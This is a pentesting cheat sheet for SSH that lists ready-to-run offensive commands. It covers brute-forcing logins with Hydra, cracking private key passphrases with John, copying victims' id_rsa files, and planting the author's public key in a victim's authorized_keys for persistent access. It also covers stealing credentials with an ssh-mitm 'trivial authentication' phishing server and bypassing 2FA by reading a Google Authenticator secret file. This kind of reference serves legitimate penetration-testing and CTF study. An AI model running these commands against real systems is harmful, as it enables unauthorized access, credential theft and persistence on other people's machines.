SSH (Secure Shell) Pentesting

SSH is a cryptographic network protocol for operating network services securely over an unsecured network. A default port is 22.

Enumeration

nmap --script ssh-brute -p 22 <target-ip>
nmap --script ssh-auth-methods --script-args="ssh.user=username" -p 22 <target-ip>
nmap --script ssh-* -p 22 <target-ip>

# User enumeration
msfconsole
msf> use auxiliary/scanner/ssh/ssh_enumusers

Brute Force Credentials

# -t: tasks
hydra -l username -P passwords.txt <target-ip> ssh -t 4
hydra -L usernames.txt -p password <target-ip> ssh -t 4

# Specific ports
hydra -l username -P passwords.txt -s 2222 <target-ip> ssh -t 4
hydra -l username -P passwords.txt ssh://<target-ip>:2222 -t 4

If the target host opens port 80 or 443, you can generate wordlist from the contents of the website then use Hydra.

cewl http://<target-ip> > wordlist.txt

Crack SSH Private Key

First of all, you need to format the private key to make John to recognize it.

ssh2john private_key.txt > hash.txt
# or
python2 /usr/share/john/ssh2john.py private_key.txt > hash.txt

Crack the password of the private key using the formatted text.

john --wordlist=wordlist.txt hash.txt

Investigation

Banner Grabbing

nc <target-ip> 22

Also, ssh-audit is an useful tool for SSH server and client auditing.

ssh-audit <target-ip>

Configuration Files

# SSH client
cat /etc/ssh/ssh_config
# SSH server
cat /etc/ssh/sshd_config

Connect

If you know a target credential, you can connect a remote server over SSH using the credential.

ssh username@<target-ip>
ssh username@<target-ip> -p 22

# Using private key
ssh -i id_rsa username@<target-ip>

# Without username
ssh 10.0.0.1

Additional Options

If we got the error message "no matching host key type found. Their offer: ssh-rsa...", add the following flag.

ssh -o HostKeyAlgorithms=+ssh-rsa user@10.0.0.1

If we got error "no matching key exchange method found. Their offer: diffie-hellman-...", add the "KexAlgorithms" flag as below.

ssh -o KexAlgorithms=+diffie-hellman-group1-sha1 user@10.0.0.1

Execute Commands after Connecting

ssh username@<target-ip> 'ls -l'

Test Connection

ssh -T username@10.0.0.1
ssh -T username@10.0.0.1 -vvv

Connect to Windows via Active Directory

ssh domain-name\\username@domain-controller

Connect using an Existing Private Key

1. Copy the Content of id_rsa (Private Key)

   In remote machine,

   cat /home/<victim-user>/.ssh/id_rsa

2. Create New Private Key in Local Machine

   echo 'copied content of id_rsa' > private_key.txt

   Don't forget to change permission this file. Otherwise, you cannot connect remote server.

   chmod 600 private_key.txt

3. Connect using Private Key

   ssh -i private_key.txt victim-user@<remote-ip>

   If the error “error in libcrypto” occured, edit the format of the RSA private key. The correct format is below:

   -----BEGIN RSA PRIVATE KEY-----
   Proc-Type:4,ENCRYPTED
   DEK-Info:AES-128-CBC,D137279D69A43E71BB7FCB87FC61D25E
   
   jqDJP+blUr+xMlASYB9t4gFyMl9VugHQJAylGZE6J/b1nG57eGYOM8wdZvVMGrfN
   bNJVZXj6VluZMr9uEX8Y4vC2bt2KCBiFg224B61z4XJoiWQ35G/bXs1ZGxXoNIMU
   ...
   ...
   ...
   7mxN/N5LlosTefJnlhdIhIDTDMsEwjACA+q686+bREd+drajgk6R9eKgSME7geVD
   -----END RSA PRIVATE KEY-----

Transfer Files

Send a File/Directory to Another Machine

# Send a file
scp ./example.txt user@<ip>:./example.txt

# Send a directory
scp -r ./example user@<ip>:/home/<ip>/

Download a File/Directory from Another Machine

# Download a file
scp user@<ip>:/home/<user>/path/to/file.txt .

# Download a directory
scp -r user@<ip>:/home/<user>/path/to/file.txt .

If you get error “connection refused”, the SSH server is not running in another machine. So you need to start the SSH server.

Create SSH Keys

Generate Keys

ssh-keygen

# Specify the output file
ssh-keygen -f key
# Specify Ed25519
ssy-keygen -t ed25519

Install SSH Key

In target machine,

ssh-copy-id username@<target-ip>

Generate SSH Keys and Set Up Public Key to Connect Remote Machine

1. Check if authorized_keys Exists in Remote Machine

ls /home/<remote-user>/.ssh/authorized_keys

If it exists, you may be able to connect SSH with your keys as victim user.

2. Generate SSH Keys in Local Machine

ssh-keygen -f key

# Copy the content of publick key
cat ./key.pub

Then copy the content of public key you generated.

3. Add the Content of Publick Key to authorized_keys

In remote machine,

echo '<content of id_rsa.pub' >> /home/<victim-user>/.ssh/authorized_keys

4. Login with Private Key

In local machine, we have a SSH private key in local machine so we can login the target SSH server with it.

# Change permission of the private key ('key', here)
chmod 600 key
# Login with it
ssh victim@<target-ip> -i key

SSH Server

Start/Stop/Restart

• Start

  sudo systemctl start ssh

• Stop

  sudo systemctl stop ssh

• Restart

  sudo systemctl restart ssh

Status

sudo systemctl status ssh

ps -e | grep ssh

Configuration

vim /etc/ssh/sshd_config

Check for any Established Connection

To get the “pts/# terminal”, run the following command. The pts stands for pseudo terminal slave.

who | grep <username>

To kill any connections, run the following commands.

# -f: full process name to match
sudo pkill -f pts/#

Logs

# Authentication logs
grep 'sshd' /var/log/auth.log

SSH Proxy Server

Sshuttle

sshuttle is transparent proxy server that works as a poor man's VPN. Forwards over ssh.

sshuttle -r username@<remote-ip> <remote-ip>/24

# Automatically determine subnet
sshuttle -r username@<remote-ip> -N

# Using private key
sshuttle -r username@<remote-ip> --ssh-cmd "ssh -i private_key" <remote-ip>/24

# Exclude the specific ip (-x)
sshuttle -r username@<remote-ip> <remote-ip>/24 -x <remote-ip>

Then you can access to other networks.

• Troubleshooting

  If you get the error "Failed to flush caches: Unit dbus-org.freedesktop.resolve1.service not found...", you need to flush DNS cache.

  sudo systemctl enable systemd-resolved.service
  sudo resolvectl flush-caches

  Run sshuttle again.

SSH-MITM for Stealing Credentials

If the target system user try to connect arbitrary host using SSH, we might be able to steal credentials by listening via the SSH man-in-the-middle server. Run the following command in local machine.

# If not have the ssh-mitm, install first.
pip3 install ssh-mitm --upgrade

# --enable-trivial-auth: The "trivial authentication" phishing attack
# --remote-host: Specify the target ip/domain
# --listen-port: Specify the ip address to listen in local machine
ssh-mitm server --enable-trivial-auth --remote-host example.com --listen-port 2222

2FA Bypass

When logging in to SSH with 2FA enabled, we will be asked for a Verification Code.

Google Authenticator

If the Google Authenticator is used, the secret key of TOTP can be stored in $HOME/.google_authenticator according to the repo.

After getting the secret key, now access to Online one-time password generator and input the secret key, then get TOTP. Now login SSH with ssh command and input the TOTP for verification code.

References

• Exploit DB